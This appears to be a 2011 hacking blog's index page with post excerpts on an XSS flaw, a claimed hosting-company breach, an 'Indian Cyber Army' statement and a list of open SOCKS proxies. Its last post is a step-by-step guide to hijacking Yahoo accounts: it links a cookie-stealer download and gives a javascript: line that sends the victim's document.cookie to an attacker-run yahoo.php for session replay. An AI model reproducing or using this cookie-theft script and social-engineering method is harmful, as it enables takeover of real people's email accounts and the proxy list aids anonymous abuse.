Pages

Tuesday, April 5, 2011

Google XSS Flaw in Website Optimizer Scripts explained !

This week thousands of system administrators who make use of Goolge products will open their inbox to see an email from Google explaining that their Web Optimizer product contains an Cross-site scripting flaw that allows hackers to inject scripts into their Google Optimized web pages.
A part of this email follows:
Read more »
Posted by Hackers Life at 11:18 AM 0 comments

Complete tutorial on Cross Site Scripting / XSS Hacking !

What is XSS ?
'XSS' also known as 'CSS' - Cross Site Scripting. It is a very common vulnerbility found in Web Applications, 'XSS' allows the attacker to INSERT malicous code, There are many types of XSS attacks, I will mention 3 of the most used. This kind of vulnerability allows an "attacker" to inject some code into the applications affected in order to bypass access to the website or to apply  "phishing" on falls users.


Types of XSS 
Read more »
Posted by Hackers Life at 11:17 AM 0 comments

Hosting company Hostkey.ru got Compromised !



A hacked Hacked Into Hosting company Hostkey.ru, some Proof of hacks are here :
1.)  Cms Hacked
Read more »
Posted by Hackers Life at 9:46 AM 0 comments

Hosting company Hostkey.ru got

Hosting company Hostkey.ru got Compromised ! : The Hacker News ~ http://www.thehackernews.com/2011/04/hosting-company-hostkeyru-got.html
Posted by Hackers Life at 9:45 AM 0 comments

Why the name – Indian Cyber Army?

No one can said that “Indian Cyber Army” is my, Even I also can’t declare that ICA is mine. Indian Cyber Army is the group of Hackers or individual from different parts of India, who care for Nation! I believe, anyone can use the name ICA, who is interested to work for Indian’s Cyber Space. Yeah, may be the way of working will be different but the aim is same. Here on our site everyone is openly invited...
Posted by Hackers Life at 9:44 AM 0 comments

Socks 4/5 04-04-2011 updated [II]

Checked at http://f.kunvn.ca/checksock/ Check report 
Begin checking....
99.194.88.228:27977@SOCKS5 $1sec
75.71.161.0:39743@SOCKS4 $1sec
76.94.157.5:46417@SOCKS4 $1sec
24.8.147.187:27977@SOCKS5 $0sec
24.14.69.124:27977@SOCKS5 $0sec
75.71.161.0:39743@SOCKS5 $0sec
221.2.144.135:1080@SOCKS4 $2sec
68.61.12.83:41513@SOCKS4 $1sec
64.85.254.149:34969@SOCKS4 $1sec
24.24.239.39:39121@SOCKS4 $1sec
75.65.10.21:27977@SOCKS5 $0sec
76.94.157.5:46417@SOCKS5 $1sec
125.46.34.28:1080@SOCKS4 $1sec
173.23.97.44:5831@SOCKS4 $0sec
Read more »
Posted by Hackers Life at 9:43 AM 0 comments

Hack Yahoo accounts with Session IDs or session cookies !

Hello Friends, This is an Guest post By Mr. Aneesh M. Makker admin of http://www.explorehacking.com/ on "Hack Yahoo accounts with Session IDs or session cookies".


What are session IDs or session cookies ?
Talking in simple language, whenever we sign into an account it generates a unique piece of string. One copy is saved on server and other in our browser as cookie. Both are matched every time we do anything in our account. This piece of string or login session is destroyed when we click on 'Sign Out' option.

Just login to yahoo.com. Type in browser javascript:alert(document.cookie);
You would get a pop up box showing you the cookies. Now login to your account and do same thing, you would see more elements added to the cookies. These represent sessions ids .

Note: By saying , stealing sessions or stealing cookies, I mean the same thing. Sessions are stored in our browser in form of cookies.

 An attacker can steal that session by convincing victim to run a piece of code in browser. Attacker can use that stolen session to login into victim's account without providing any username/password. This attack is very uncommon because when the victim  clicks 'Sign out' , session gets  destroyed and attacker too also gets signed out.

But in case of yahoo, its not the same.The attacker doesnt get signed out when victim clicks 'Sign out'. Though the session automatically gets destroyed after 24hrs  by yahoo. But when user simply refreshes the windows in yahoo account, he gets sessions for next 24 hrs. This means, once the  yahoo account session is stolen , attacker can access the account for life time by refreshing window in every 24hrs. I am not actually sure whether its 24 or 48 hrs.

Requirement: Download some files from here
http://www.ziddu.com/downloadlink/13712247/cookiestealer.rar

Tutorial to steal session IDs :-
1. Sign Up for an account at any free webhosting site. I have chosen my3gb.com.

2.  Login to your account and go to file manager. Upload the four files that you have just downloaded.
    Make a new directory 'cookies' here.

3. Give this  code to victim to run in his browser when he would be logged in to his yahoo account. Yahoo.php is basically cookie stealing script and hacked.php executes the stolen cookies in browser.
Stolen cookies get stored in directory 'cookies'
javascript:document.location='http://yourdomain.com/yahoo.php?ex='.concat(escape(document.cookie)); 
He would again redirected to his yahoo account.

4. Open the hacked.php . The password is 'explore'.

You must have got the username of victim's account. Simply Click on it and it would take you to inbox of victim's yahoo account without asking for any password.

Now it doesn't matter if victim signs out from his account, you would remain logged into it.

Note: You can try this attack by using two browsers. Sign into yahoo account in one browser and run the code. Then sign in through other browser using stolen session.

Thank you for reading this Article.
Posted by Hackers Life at 4:59 AM 0 comments
 
Powered by Blogger